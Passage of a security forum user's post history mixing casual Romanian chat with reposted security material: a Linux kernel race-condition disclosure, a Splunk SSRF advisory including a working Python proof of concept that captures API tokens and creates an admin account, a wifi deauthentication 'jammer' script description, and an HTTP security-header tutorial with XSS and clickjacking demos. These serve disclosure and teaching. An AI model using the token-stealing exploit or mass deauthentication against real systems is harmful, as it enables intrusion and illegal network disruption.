Jump to content

Nytro

Administrators
  • Posts

    18785
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. Apropo, la chinezesti e posibil ca toate datele personale (contacte, SMS-uri etc) sa ajunga la chinezi. Bine, si la romanesti, sa ajunga la ai nostri Da, ramai la chinezesi, cel putin aia nu stiu sa le citeasca
  2. Le-am luat acum un an cred, pe langa faptul ca lor li se pare OK, si mie mi se pare ca e OK.
  3. Am luat alor mei un AllView P5 Quad si isi face treaba super bine. Merge mai bine ca Galaxy S4-ul pe care il aveam in trecut.
  4. Terminati cu prostiile, daca vreti ceva ieftin si OK, luati AllView.
  5. Live: https://streaming.media.ccc.de/33c3 Schedule: https://fahrplan.events.ccc.de/congress/2016/Fahrplan/schedule.html Videos: https://media.ccc.de/c/33c3
      • 1
      • Upvote
  6. Nytro

    Fun stuff

    Forta
  7. Nytro

    Fun stuff

    Nationalist.
  8. Nytro

    Fun stuff

    Fanii nostri (vezi nr inmatriculare): https://www.facebook.com/vladimir.enachescu/posts/10154846666986663
  9. Nytro

    Fun stuff

  10. Acum ceva timp, a fost organizat un protest impotriva ACTA https://ro.wikipedia.org/wiki/Acordul_comercial_de_combatere_a_contrafacerii Pe Facebook au anuntat ca vor fi 40.000. In Piata Universitatii am fost 400. A, da, ningea afara si era cam frig, acasa pe Facebook e cald.
  11. Informativ, dar stiati deja: http://www.digi24.ro/stiri/actualitate/politica/alegeri-parlamentare-2016/votul-incertitudinii-ce-alegeri-au-fost-astazi-prezidentiale-630145
  12. Forta GovITHub, muie Dragnea!
  13. Linus a spus de mai multe ori ca pe el il intereseaza mai mult ca Linux sa fie stabil, nu sigur. Cu alte cuvinte, e de preferat sa nu iei PANIC in locul a mai putine LOCAL privilege escalation.
  14. Nytro

    Salut

    Sugestia mea e sa te gandesti mai bine la viitorul tau pe termen lung. Poti face multe cu programarea. Pentru Linux, instaleaza-ti o versiune si joaca-te cu ea. Exista o gramada de tutoriale despre orice, dar poti incepe cu ce a spus aelius.
  15. CVE-2016-8655 Linux af_packet.c race condition (local root) From: Philip Pettersson <philip.pettersson () gmail com> Date: Tue, 6 Dec 2016 11:50:57 +0900 Hello, This is an announcement about CVE-2016-8655 which is a race-condition I found in Linux (net/packet/af_packet.c). It can be exploited to gain kernel code execution from unprivileged processes. The bug was introduced on Aug 19, 2011: https://github.com/torvalds/linux/commit/f6fb8f100b807378fda19e83e5ac6828b638603a Fixed on Nov 30, 2016: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c =*=*=*=*=*=*=*=*= BUG DETAILS =*=*=*=*=*=*=*=*= To create AF_PACKET sockets you need CAP_NET_RAW in your network namespace, which can be acquired by unprivileged processes on systems where unprivileged namespaces are enabled (Ubuntu, Fedora, etc). It can be triggered from within containers to compromise the host kernel. On Android, processes with gid=3004/AID_NET_RAW are able to create AF_PACKET sockets (mediaserver) and can trigger the bug. I found the bug by reading code paths that have been opened up by the emergence of unprivileged namespaces, something I think should be off by default in all Linux distributions given its history of security vulnerabilities. The problem is inside packet_set_ring() and packet_setsockopt(). We can reach packet_set_ring() by calling setsockopt() on the socket using the PACKET_RX_RING option. If the version of the packet socket is TPACKET_V3, a timer_list object will be initialized by packet_set_ring() when it calls init_prb_bdqc(). ... switch (po->tp_version) { case TPACKET_V3: /* Transmit path is not supported. We checked * it above but just being paranoid */ if (!tx_ring) init_prb_bdqc(po, rb, pg_vec, req_u); break; default: break; } ... The function flow to set up the timer is: packet_set_ring()->init_prb_bdqc()->prb_setup_retire_blk_timer()-> prb_init_blk_timer()->prb_init_blk_timer()->init_timer() When the socket is closed, packet_set_ring() is called again to free the ring buffer and delete the previously initialized timer if the packet version is > TPACKET_V2: ... if (closing && (po->tp_version > TPACKET_V2)) { /* Because we don't support block-based V3 on tx-ring */ if (!tx_ring) prb_shutdown_retire_blk_timer(po, rb_queue); } ... The issue is that we can change the packet version to TPACKET_V1 with packet_setsockopt() after init_prb_bdqc() has been executed and before packet_set_ring() has returned. There is an attempt to deny changing socket versions after a ring buffer has been initialized, but it is insufficient: ... case PACKET_VERSION: { ... if (po->rx_ring.pg_vec || po->tx_ring.pg_vec) return -EBUSY; ... There's plenty of room to race this code path between the calls to init_prb_bdqc() and swap(rb->pg_vec, pg_vec) in packet_set_ring(). When the socket is closed, packet_set_ring() will not delete the timer since the socket version is now TPACKET_V1. The struct timer_list that describes the timer object is located inside the struct packet_sock for the socket itself however and will be freed with a call to kfree(). We then have a use-after-free on a timer object that can be exploited by various poisoning attacks on the SLAB allocator (I find add_key() to be the most reliable). This will ultimately lead to the kernel jumping to a manipulated function pointer when the timer expires. The bug is fixed by taking lock_sock(sk) in packet_setsockopt() when changing the packet version while also taking the lock at the start of packet_set_ring(). My exploit defeats SMEP/SMAP and will give a rootshell on Ubuntu 16.04, I will hold off a day on publishing it so people have some time to update. New Ubuntu kernels are out so please update as soon as possible. =*=*=*=*=*=*=*=*= TIMELINE =*=*=*=*=*=*=*=*= 2016-11-28: Bug reported to security () kernel org 2016-11-30: Patch submitted to netdev, notification sent to linux-distros 2016-12-02: Patch committed to mainline kernel 2016-12-06: Public announcement =*=*=*=*=*=*=*=*= LINKS =*=*=*=*=*=*=*=*= https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8655 https://github.com/torvalds/linux/commit/f6fb8f100b807378fda19e83e5ac6828b638603a https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c https://www.ubuntu.com/usn/usn-3151-1/ =*=*=*=*=*=*=*=*= CREDIT =*=*=*=*=*=*=*=*= Philip Pettersson Sursa: http://seclists.org/oss-sec/2016/q4/607
  16. ARMv8 Shellcodes from ‘A’ to ‘Z’ Hadrien Barral, Houda Ferradi, R´emi G´eraud, Georges-Axel Jaloyan and David Naccache Ecole normale superieure – Computer Science Department ´ 45 rue d’Ulm 75230 Paris cedex 05, France firstname.lastname@ens.fr August 12, 2016 Abstract We describe a methodology to automatically turn arbitrary ARMv8 programs into alphanumeric executable polymorphic shellcodes. Shellcodes generated in this way can evade detection and bypass filters, broadening the attack surface of ARM-powered devices such as smartphones. Download: https://arxiv.org/pdf/1608.03415.pdf
  17. IoT e viitorul...
  18. Stegano exploit kit poisoning pixels BY PETER STANCIK POSTED 6 DEC 2016 - 12:00PM ESET researchers have discovered a new exploit kit spreading via malicious ads on a number of reputable news websites, each with millions of visitors daily. Since at least the beginning of October 2016, the bad guys have been targeting users of Internet Explorer and scanning their computers for vulnerabilities in Flash Player. Exploiting these flaws in the code, they have been attempting to download and execute various types of malware. The attacks fall into the category of so-called malvertising due to the fact that the malicious code has been distributed through advertising banners. To make things worse, the attackers responsible are using stealthy, even paranoid, techniques, which makes analysis quite complicated and has thus necessitated an extensive research report. I asked Robert Lipovsky, one of ESET’s senior malware researchers, to give us a less technical overview of the case. What does your discovery mean for internet users? It means that there are advertising banners with “poisoned pixels” leading to a new exploit kit, intended to enable the bad guys to remotely install malware onto victims’ computers. The victim doesn’t even need to click on the malicious ad content; all it takes is to visit a website displaying it. If the victim’s computer runs a vulnerable version of Flash Player, the machine will be compromised via an exploited vulnerability automatically. After that, the bad guys have all they need to download and execute the malware of their choice. Some of the payloads we analyzed include banking trojans, backdoors and spyware, but the victims could end up facing a nasty ransomware attack, for example. Once again this threat shows how important it is to have your software fully patched and to be protected by a reputable security solution. In this particular case, either of these measures fully protects you from this specific attack. Where are the poisoned pixels in this? Well, the name “Stegano” refers to steganography, which is a technique the bad guys used to hide parts of their malicious code in the pixels of the advertisements’ banners. Specifically, they hide it in the parameters controlling the transparency of each pixel. This makes only minor changes to the (color) tone of the picture, making the changes effectively invisible to the naked eye and so unnoticed by the potential victim. How does the attack work? I believe the following scheme is the best way to explain what is happening in this case: Your analysis shows that the creators of the Stegano exploit kit are trying hard to stay unseen. What makes them so paranoid? Attackers have succeeded in circumventing the countermeasures designed to uncover and block malicious content on advertising platforms, which has resulted in legitimate websites unknowingly serving infected content to millions of potential victims. On top of that, the malicious version of the ad is served only to a specific target group, selected by the attackers’ server. The decision-making logic behind the choice of target is unknown and this helps the bad guys to go further in dodging suspicion on the advertising platforms’ side. But those are not the only reasons why they try hard to stay stealthy – and that’s where the attackers get really paranoid. The crooks behind the Stegano exploit kit are also trying to stay off the radar of experienced cybersecurity research teams hunting for malware. Hiding code in the pixels would not be enough to escape this kind of attention, so they have implemented a series of checks to detect whether the code is being surveilled. If any kind of surveillance is detected, the exploit kit’s activities simply stop and no malicious content is served. How do they know when the code is being observed? The exploit kit mainly tries to detect whether or not it is sitting in a sandbox, or if it is running on a virtual machine that was created for detection purposes. Also, the malware checks for any security software that might be present and sends this information to its operators. Can you say how many users have already seen these banners with poisoned pixels? Our detection systems show that in the last two months the malicious ads have been displayed to more than a million users on several very popular websites. Bear in mind, this is a rather conservative estimate based only on our own telemetry from users participating in ESET LiveGrid®. After all, the visitor counts of some of these websites are in the millions daily. Can you be more specific? Which websites were affected? The purpose of this research is to shed light on the activities of the bad guys and to make users safe from this threat. In this case, disclosure of the websites known to have been affected wouldn’t add any extra value in this regard. On the contrary, it could provide a false sense of security to those who have not visited these sites, as the banners could have appeared on practically any website that displays ads. We should also mention the reputational harm this could inflict on victimized pages, especially since there is nothing they could have done to prevent these attacks, as the targeted ad space isn’t completely under their control. What should I do to stay protected from exploit kit attacks? First of all, let me highlight again that those who are diligent in protecting their computers, are safe from these specific attacks. Keeping both the system and all applications patched and using a reliable internet security solution are strong precautions that help prevent such attacks. However, for unwary users, malvertising poses a serious threat, and their only hope is that malicious banners won’t make it onto websites they visit. Sursa: http://www.welivesecurity.com/2016/12/06/stegano-exploit-kit/
  19. Do NOT try this! How to guess credit card security codes by Paul Ducklin If you’ve ever used your credit card online, or over the phone, you’ve probably been asked for something known informally as the “short code” or “security code”. That’s usually a three-digit number physically printed (but not embossed) at the right hand end of the signature strip on the back of your card. Three digits don’t sound enough to make much of a password, and in normal circumstances they wouldn’t be. But for what are known as card-not-present transctions, the CVV, or Card Verification Value as it is commonly known, provides a handy degree of protection against one of the most common sorts of credit card fraud, namely skimming. Sophos Home Skimming is where the crooks use a booby-trapped card reader, for example glued over the real card reader on an ATM, or cunningly squeezed into the card slot on a payment terminal, to read and record the magnetic stripe on your card. Even if you have a Chip and PIN card, the magstripe contains almost enough information for a crook to convince a website they have your card. For example, your name as it appears on the front of the card, the “long code”, usually 16 digits across the face of the card, and the expiry date are all there on the magstripe, ready to be copied surreptitiously and used on the web. The CVV therefore acts as a very low-tech barrier to card-not-present fraud, because most websites also require you to type in the CVV, which is not stored on the magstripe and therefore can’t be skimmed. Of course, there are numerous caveats here, including: The vendor mustn’t store your CVV after the transaction is complete. The security usefulness of the CVV depends on it never lying around where it could subsequently fall foul of cyberthieves. The payment processor mustn’t allow too many guesses at your CVV. With unlimited guesses and a three-digit code, even a crook working entirely by hand could try all the possibilities with a few hours. Guessing CVVs Researchers at Newcastle University in the UK recently decided to see just how effectively the second caveat was enforced, by trying to guess CVVs. The initial findings were encouraging: after a few guesses on the same website, they’d end up locked out and unable to go and further. Then they tried what’s called a distributed attack, using a program to submit payment requests automatically to lots of websites at the same time. You can see where this is going. If each website gives you five guesses, then with 200 simultaneous guesses on a range of different websites, you can get through 1000 guesses (200 × 5) in quick order without triggering a block on any of the sites. And with 1000 guesses, you can cover all CCV possibilities from 000 to 999, stopping when you succeed. Then you can go to that 251st site and order just about whatever you like, because you’ve “solved” the CVV without ever actually seeing the victim’s card. In other words, you’d expect the payment processor’s back-end servers to keep track not just of the number of CVV guesses from each site, but the total number of guesses since your last successful purchase from any site. According to Newcastle University, Mastercard stopped this sort of distributed guessing, but Visa did not. Should you worry? Considering how much credit card fraud happens without any need for CVV-guessing tricks like this, we don’t think this is a signal to give up online purchases entirely this festive season. Afte all, if any of the sites or services you used recently kept your CVV, even if only to write it down temporarily while processing your transaction, you’re exposed anyway, so CVVs aren’t a significant barrier to determined crooks. And if you’ve ever put your card details into a hacked or fraudulent website – even (or perhaps especially) if the transaction was never finalised – then the crooks probably already have everything they need to clone your card. What to do? A few simple precautions will help, regardless of your card provider: Don’t let your card out of your sight. Crooks working out of sight, even for just a few seconds, can skim your card easily simply by running it through two readers. They can also snap a sneaky picture of the back of the card to record both your signature and the CVV. Try to use the Chip and PIN slot when paying in person. Most chip readers only require you to insert your card far enough to connect up to the chip. This leaves most of the magstripe sticking out, making skimming the card details harder. If in doubt, find another retailer or ATM. Most ATMs still require you to insert your whole card, and can therefore be fitted with glued-on magstripe skimmers. If you aren’t sure, why not get hold and give it a wiggle? Skimmers often don’t feel right, because they aren’t part of the original ATM. Stick to online retailers you trust. Check the address bar of the payment page, make sure you’re on an encrypted (HTTPS) site, and if you see any web certificate warnings, bail out immediately. Keep an eye on your statements. If your bank has a service to send you a message notifying you when transactions take place, consider turning it on. Follow @NakedSecurity Follow @duckblog Sursa: https://nakedsecurity.sophos.com/2016/12/05/how-to-guess-credit-card-security-codes/
  20. From: Francesco Oddo <francesco.oddo () security-assessment com> Date: Fri, 9 Dec 2016 14:54:02 +1300 ( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Splunk Enterprise Server-Side Request Forgery Affected versions: Splunk Enterprise <= 6.4.3 PDF: http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf +-----------+ |Description| +-----------+ The Splunk Enterprise application is affected by a server-side request forgery vulnerability. This vulnerability can be exploited by an attacker via social engineering or other vectors to exfiltrate authentication tokens for the Splunk REST API to an external domain. +------------+ |Exploitation| +------------+ ==Server-Side Request Forgery== A server-side request forgery (SSRF) vulnerability exists in the Splunk Enterprise web management interface within the Alert functionality. The application parses user supplied data in the GET parameter ‘alerts_id’ to construct a HTTP request to the splunkd daemon listening on TCP port 8089. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make a HTTP request to an arbitrary destination host. The issue is aggravated by the fact that the application includes the REST API token for the currently authenticated user within the Authorization request header. This vulnerability can be exploited via social engineering to obtain unauthorized access to the Splunk REST API with the same privilege level of the captured API token. [POC SSRF LINK] /en-US/alerts/launcher?eai%3Aacl.app=launcher&eai%3Aacl.owner=*&severity=*&alerts_id=[DOMAIN]&search=test The proof of concept below can be used to listen for SSRF connections and automatically create a malicious privileged user when an administrative token is captured. [POC - splunk-poc.py] from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import httplib import ssl import requests token = '' class MyHandler(BaseHTTPRequestHandler): def do_GET(self): global token try: token = self.headers.get('Authorization')[7:] print "[+] Captured Splunk API token from GET request" except Exception, e: print "[-] No API token captured on incoming connection..." def adminTokenNotCaptured(): global token if token: query = "/services/authentication/httpauth-tokens/" + token conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089, context=ssl._create_unverified_context()) conn.putrequest("GET", query) conn.putheader("Authorization", "Splunk %s" % token) conn.endheaders() context = conn.getresponse().read() if 'userName">admin' in context: print "[+] Confirmed Splunk API token belongs to admin user" print "[+] Admin Splunk API Token: %s" % token return False else: print "[!] Splunk API token does not belong to admin user" return True def poc(): global token create_user_uri = "https://<SPLUNK IP>:8089/services/authentication/users" params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'} auth_header = {'Authorization': 'Splunk %s' % token} requests.packages.urllib3.disable_warnings() response = requests.post(url=create_user_uri, data=params, headers=auth_header, verify=False) if "<title>infosec" in response.content: print "[+] POC admin account 'infosec:password' successfully created" else: print "[-] No account was created" print response.content if __name__ == "__main__": try: print "[+] Starting HTTP Listener" server = HTTPServer(("", 8080), MyHandler) while adminTokenNotCaptured(): server.handle_request() poc() except KeyboardInterrupt: print "[+] Stopping HTTP Listener" server.socket.close() +----------+ | Solution | +----------+ Update to Splunk 6.5.0 or later. Full information about all patched versions are provided in the reference links below. +------------+ | Timeline | +------------+ 24/08/2016 – Initial disclosure to vendor 25/08/2016 – Vendor acknowledges receipt of the advisory and confirms vulnerability. 28/09/2016 – Sent follow up email asking for status update 30/09/2016 – Vendor replies fixes are being backported to all supported versions of the software. 10/11/2016 – Vendor releases security advisory and patched software versions 09/12/2016 – Public disclosure +------------+ | Additional | +------------+ http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf https://www.splunk.com/view/SP-CAAAPSR [SPL-128840] Sursa: http://seclists.org/fulldisclosure/2016/Dec/30
  21. New Smartwatch OS Debuts on GitHub By John P. Mello Jr. Dec 9, 2016 7:00 AM PT Can a new smartwatch operating system based on Linux breathe some new life into the smart wearables market? Florent Revest hopes so. Revest, a French computer science student, on Wednesday announced the alpha release of AsteroidOS, an open source operating system that will run on several Android smartwatch models. "Many users believe that the current proprietary platforms can not guarantee a satisfactory level of control over their privacy and hardware," noted Revest, who has been working on his OS for two years. "Hence, I noticed a need for an open wearable platform and AsteroidOS is my attempt to address this issue." The alpha edition of AsteroidOS contains some basic apps: agenda, for scheduling events to remember; an alarm clock; a calcuator; music, for controlling the music player on a phone; a stopwatch; a timer and a weather app. The OS will run, more or less, on the LG G Watch, LG G Urbane, Asus ZenWatch 2 and Sony Smartwatch 3, Revest noted. Bluetooth works only on the G Watch, though. Uphill Battle Launching an open source mobile operating system can be a daunting and seemingly futile task. "This has been tried repeatedly in the past and has failed," said Jack E. Gold, principal analyst at J.Gold Associates. So far there's only been one open source success story in the mobile market, and that's been Android -- which eventually was consumed by Google and closed off, noted Patrick Moorhead, principal analyst at Moor Insights and Strategy. "Firefox, Meego and Ubuntu have tried this and, unfortunately, haven't met with success," he told LinuxInsider. Breaking From Past However, Revest's focus on smartwatches may give his OS a better chance of success than past open source efforts had, said Charles King, principal analyst at Pund-IT. "There's certainly no guarantee that AsteroidOS can breathe life into so stagnant a market -- but at the same time, the new OS won't encounter the barriers it would in more mature markets, such as smartphones," he told LinuxInsider. "There's a hole in the market for this," said Ross Rubin, principal analyst at Reticle Research. "Unlike the phone and tablet market, where you can use the Android open source platform and build something based on that, there really hasn't been much for smartwatches," he told LinuxInsider. Google offers a form of Android for wearables, but it can't be modified the way the open source version of Android can. Narrow Appeal While Revest envisions growth of AsteroidOS as an open source community builds around it and it becomes compatible with more devices, broad adoption may be a long shot. Manufacturers who produce custom phones for target markets, such as low cost phones for emerging markets, might be interested in AsteroidOS, suggested Gold. However, "you can do this with Android-Linux already," he told LinuxInsider, "and with a new OS, there will be no availability of apps, so the devices will be very unattractive." Chinese phone makers who use open source Android may use AsteroidOS to produce very inexpensive smartwatches, said Rubin, "but inexpensive smartwatches haven't been driving the market. Pebble was an inexpensive smartwatch, and look what happened to it." The early adopters of the OS will be Linux enthusiasts and hobbyists, King said. Since the OS can work on older watches, early users likely will run the software on second-hand hardware. "That's a dynamic that drove significant early interest in Linux during the mid- to late-1990s, when people ported the OS to a wide variety of x86-based PCs and servers that were well past their prime," King recalled. Many of the initial users of AsteroidOS likely will be developers and Linux evangelists, he said. "If AsteroidOS can gain a foothold with them, it could well spark commercial interest and adoption further down the road." Pebble Crushed Revest's announcement came on the same day that news broke that one of the pioneers in the smartwatch market, Pebble, has been purchased by Fitbit, reportedly for US$40 million. Fitbit, a fitness band maker, made the purchase to acquire key personnel and intellectual property. The deal does not include Fitbit's hardware, which will be discontinued. The smartwatch market took a tumble in the third quarter, according to IDC. Shipments of wearable products were up 3.1 percent -- to 23.0 million from 22.3 million in the same quarter a year ago -- the firm reported earlier this week. "It's still early days, but we're already seeing a notable shift in the market," observed IDC Senior Research Analyst Jitesh Ubrani. "Where smartwatches were once expected to take the lead, basic wearables now reign supreme." John Mello is a freelance technology writer and contributor to Chief Security Officer magazine. You can connect with him on Google+. Sursa: http://www.linuxinsider.com/story/84154.html?rss=1
  22. Nytro

    jammer

    jammer A Bash script to automate the continuous circular deauthentication of all the wifi networks in your reach I am not responsible for any misuses of the script Keep in mind that it is generally illegal to use the script at your neihborhood It is designed for pen-testing purposes It has only been tested on my two machines, so there may still be bugs that can even cause data loss That's why I suggest you take a good look at the code before you execute it There will be updates as soon as I fix something or make a nice improvement Not that anyone will see this Jammer v0.3 Usage: jammer [OPTION] ... Jam Wifi Networks That Your Wireless Card Can Reach. -d, --deauths: Set the number of deauthentications for each station. Default is 10 -y, --yes: Make 'Yes' the answer for everything the script asks -s, --endless: When reaching the end of the list, start again -f, --whitelist: A file with ESSID's to ignore during the attack -k, --keep: Keep the scan files after the script ends -n, --name: Choose the names the scan files are saved as -e, --ethernet: Set the name for the ethernet interface. Default is 'eth0' -w, --wireless: Set the name for the wireless interface. Default is 'wlan0' -h, --help: Show this help message Looking at this help message a suggested way to call the script is $ sudo ./jammer -y -s -d 20 -f whitelist.txt Sursa: https://github.com/billpcs/jammer
  23. Exotic HTTP Headers Exploration of HTTP security and other non-typical headers Last updated on December 9, 2016 Table of Contents X-XSS-Protection No header X-XSS-Protection: 0 X-XSS-Protection: 1 X-XSS-Protection: 1; mode=block X-XSS-Protection: 1; report=http://localhost:1234/report X-Frame-Options No header X-Frame-Options: deny X-Frame-Options: sameorigin X-Frame-Options: allow-from http://localhost:4321 X-Content-Type-Options No header X-Content-Type-Options: nosniff Content-Security-Policy No header Content-Security-Policy: default-src 'none' Content-Security-Policy: default-src 'self' Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' Other Strict-Transport-Security Public-Key-Pins Content-Encoding: br Timing-Allow-Origin Alt-Svc P3P X-XSS-Protection Cross-Site Scripting (XSS) is an attack in which malicious scripts can be injected on a page. For example: <h1>Hello, <script>alert('hacked')</script></h1> This is a pretty obvious attack and something that browsers can block: if you find a part of the request in the source code, it might be an attack. The X-XSS-Protection controls this behavior. Values: 0 Filter disabled. 1 Filter enabled. If a cross-site scripting attack is detected, in order to stop the attack, the browser will sanitize the page. 1; mode=block Filter enabled. Rather than sanitize the page, when a XSS attack is detected, the browser will prevent rendering of the page. 1; report=http://domain/url Filter enabled. The browser will sanitize the page and report the violation. This is a Chromium function utilizing CSP violation reports to send details to a URI of your choice. Let's create a simple web server with node.js to play with this. var express = require('express') var app = express() app.use((req, res) => { if (req.query.xss) res.setHeader('X-XSS-Protection', req.query.xss) res.send(`<h1>Hello, ${req.query.user || 'anonymous'}</h1>`) }) app.listen(1234) I am using Google Chrome 55. No header http://localhost:1234/?user= Nothing happens. The browser successfully prevented this attack. This is the default behavior in Chrome if no header is set, as you can see in the error message in the Console. It even helpfully highlights it in the source. X-XSS-Protection: 0 http://localhost:1234/?user= &xss=0 Oh no! X-XSS-Protection: 1 http://localhost:1234/?user= &xss=1 The attack was successfully blocked by sanitizing the page because of our explicit header. X-XSS-Protection: 1; mode=block http://localhost:1234/?user= &xss=1; mode=block The attack is blocked by simply not rendering the page. X-XSS-Protection: 1; report=http://localhost:1234/report http://localhost:1234/?user= &xss=1; report=http://localhost:1234/report The attack is blocked and also reported to an address of our choice. X-Frame-Options This header allows you to prevent clickjack attacks. Imagine that an attacker has a YouTube channel and he needs subscribers. He can create a website with a button that says "Do not click" which means that everyone will definitely click on it. But there's a completely transparent iframe on top of the button. When you click the button, you actually click on the Subscribe button on YouTube. If you were logged into YouTube, you will now be subscribed to the attacker. Let's illustrate this. First, install the Ignore X-Frame headers extension. Create this HTML file. <style> button { background: red; color: white; padding: 10px 20px; border: none; cursor: pointer; } iframe { opacity: 0.8; z-index: 1; position: absolute; top: -570px; left: -80px; width: 500px; height: 650px; } </style> <button>Do not click his button!</button> <iframe src="https://youtu.be/dQw4w9WgXcQ?t=3m33s"></iframe> As you can see, I have cleverly positioned the viewport of the iframe to the Subscribe button. The iframe is on top of the button (z-index: 1) so when you try to click the button you click on the iframe instead. In this example, the iframe is not completely hidden but I could do that with opacity: 0. In practice, this does not work because you are not logged into YouTube, but you get the idea. You can prevent your website from being embedded as an iframe with the X-Frame-Options header. Values deny No rendering within a frame. sameorigin No rendering if origin mismatch. allow-from: DOMAIN Allows rendering if framed by frame loaded from DOMAIN. We are going to use this webserver for experiments. var express = require('express') for (let port of [1234, 4321]) { var app = express() app.use('/iframe', (req, res) => res.send(`<h1>iframe</h1><iframe src="//localhost:1234?h=${req.query.h || ''}"></iframe>`)) app.use((req, res) => { if (req.query.h) res.setHeader('X-Frame-Options', req.query.h) res.send('<h1>Website</h1>') }) app.listen(port) } No header Everyone can embed our website at localhost:1234 in an iframe. http://localhost:1234/iframe http://localhost:4321/iframe X-Frame-Options: deny No one can embed our website at localhost:1234 in an iframe. http://localhost:1234/iframe?h=deny http://localhost:4321/iframe?h=deny X-Frame-Options: sameorigin Only we can embed our website at localhost:1234 in an iframe on our website. An origin is defined as a combination of URI scheme, hostname, and port number. http://localhost:1234/iframe?h=sameorigin http://localhost:4321/iframe?h=sameorigin X-Frame-Options: allow-from http://localhost:4321 It looks like Google Chrome ignores this directive because you can use Content Security Policy (see below). Invalid 'X-Frame-Options' header encountered when loading 'http://localhost:1234/?h=allow-from%20http://localhost:4321': 'allow-from http://localhost:4321' is not a recognized directive. The header will be ignored. It also had no effect in Microsoft Edge. Here's Mozilla Firefox. http://localhost:1234/iframe?h=allow-from http://localhost:4321 http://localhost:4321/iframe?h=allow-from http://localhost:4321 X-Content-Type-Options This header prevents MIME confusion attacks (<script src="script.txt">) and unauthorized hotlinking (<script src="https://raw.githubusercontent.com/user/repo/branch/file.js">). var express = require('express') var app = express() app.use('/script.txt', (req, res) => { if (req.query.h) res.header('X-Content-Type-Options', req.query.h) res.header('content-type', 'text/plain') res.send('alert("hacked")') }) app.use((req, res) => { res.send(`<h1>Website</h1><script src="/script.txt?h=${req.query.h || ''}"></script>`) }) app.listen(1234) No header http://localhost:1234/ Even though script.txt is a text file with the content type of text/plain it was still executed as if it was a piece of JavaScript. X-Content-Type-Options: nosniff http://localhost:1234/?h=nosniff This time the content types do not match and the file was not executed. Content-Security-Policy The new Content-Security-Policy (CSP) HTTP response header helps you reduce XSS risks on modern browsers by declaring what dynamic resources are allowed to load via a HTTP Header. You can ask the browser to ignore inline JavaScript and load JavaScript files only from your domain, for example. Inline JavaScript can be not only <script>...</script> but also <h1 onclick="...">. Let's see how it works. var request = require('request') var express = require('express') for (let port of [1234, 4321]) { var app = express() app.use('/script.js', (req, res) => { res.send(`document.querySelector('#${req.query.id}').innerHTML = 'changed by ${req.query.id} script'`) }) app.use((req, res) => { var csp = req.query.csp if (csp) res.header('Content-Security-Policy', csp) res.send(` <html> <body> <h1>Hello, ${req.query.user || 'anonymous'}</h1> <p id="inline">is this going to be changed by inline script?</p> <p id="origin">is this going to be changed by origin script?</p> <p id="remote">is this going to be changed by remote script?</p> <script>document.querySelector('#inline').innerHTML = 'changed by inline script'</script> <script src="/script.js?id=origin"></script> <script src="//localhost:1234/script.js?id=remote"></script> </body> </html> `) }) app.listen(port) } No header http://localhost:4321 It works like you would normally expect it to. Content-Security-Policy: default-src 'none' http://localhost:4321/?csp=default-src 'none'&user= default-src applies to all resources (images, scripts, frames, etc.) and the value of 'none' doesn't allow anything. We can see it in action here, along with very helpful error messages. Chrome refused to load or execute any of the scripts. It also tried to load favicon.ico even though it's also prohibited. Content-Security-Policy: default-src 'self' http://localhost:4321/?csp=default-src 'self'&user= Now we can load scripts from our origin, but still no remote or inline scripts. Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' http://localhost:4321/?csp=default-src 'self'; script-src 'self' 'unsafe-inline'&user= This time we also allow inline scripts to run. Note that our XSS attack was also prevented. But not when you allow unsafe-inline and set X-XSS-Protection: 0 at the same time. Other content-security-policy.com has nicely formatted examples. default-src 'self' allows everything but only from the same origin script-src 'self' www.google-analytics.com ajax.googleapis.com allows Google Analytics, Google AJAX CDN and Same Origin default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src 'self'; allows images, scripts, AJAX, and CSS from the same origin, and does not allow any other resources to load (eg object, frame, media, etc). It is a good starting point for many sites. I have not tested this but I think that frame-ancestors 'none' should be equivalent to X-Frame-Options: deny frame-ancestors 'self' should be equivalent to X-Frame-Options: sameorigin frame-ancestors localhost:4321 should be equivalent to X-Frame-Options: allow-from http://localhost:4321 script-src 'self' i.e. without 'unsafe-inline' should be equivalent to X-XSS-Protection: 1 If you take a look at facebook.com and twitter.com headers, they use CSP a lot. Strict-Transport-Security HTTP Strict Transport Security (HSTS) is a web security policy mechanism which helps to protect websites against protocol downgrade attacks. Let's say that you want to go to facebook.com. Unless you type https://, the default protocol is HTTP and the default port for HTTP is 80. So the request will be made to http://facebook.com. $ curl -I facebook.com HTTP/1.1 301 Moved Permanently Location: https://facebook.com/ And then you are redirected to the secure version of Facebook. If you were connected to a public WiFi that an attacker is running, they could hijack this request and serve their own webpage that looks identical to facebook.com and collect your password. What you can do to prevent this is to use this header to tell that the next time the user wants to go to facebook.com, they should be taken to the https version instead. $ curl -I https://www.facebook.com/ HTTP/1.1 200 OK Strict-Transport-Security: max-age=15552000; preload If you logged into Facebook at home and then went to facebook.com on the insecure WiFi, you'd be safe because the browser remembers this header. But what if you used Facebook on the insecure network for the first time ever? Then you are not protected. To fix this, browsers ship with a hard-coded list of domains known as the HSTS preload list that includes the most popular domain names that are HTTPS only. If you want to, you could try to submit your own here. It's also a handy website for testing if your site is using this header correctly. Yeah, I know, mine doesn't. Values, combination of, separated by ; max-age=15552000 The time, in seconds, that the browser should remember that this site is only to be accessed using HTTPS. includeSubDomains If this optional parameter is specified, this rule applies to all of the site's subdomains as well. preload If the site owner would like their domain to be included in the HSTS preload list maintained by Chrome (and used by Firefox and Safari). What if you need to switch back to HTTP before max-age or if you had preload? You are out of 